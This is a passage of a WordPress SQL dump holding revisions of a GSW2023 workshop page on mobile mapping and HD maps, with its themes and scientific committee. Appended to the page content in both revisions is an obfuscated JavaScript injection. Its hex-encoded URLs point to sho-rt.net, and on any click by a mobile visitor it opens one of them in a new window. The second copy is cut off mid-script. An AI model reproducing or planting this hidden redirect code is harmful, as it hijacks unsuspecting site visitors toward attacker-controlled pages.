processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:59:15','2022-10-07 19:59:15','',2095,'https://gsw2023.com/?p=2566',0,'revision','',0),
(2567,1,'2022-10-07 20:01:12','2022-10-07 20:01:12','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 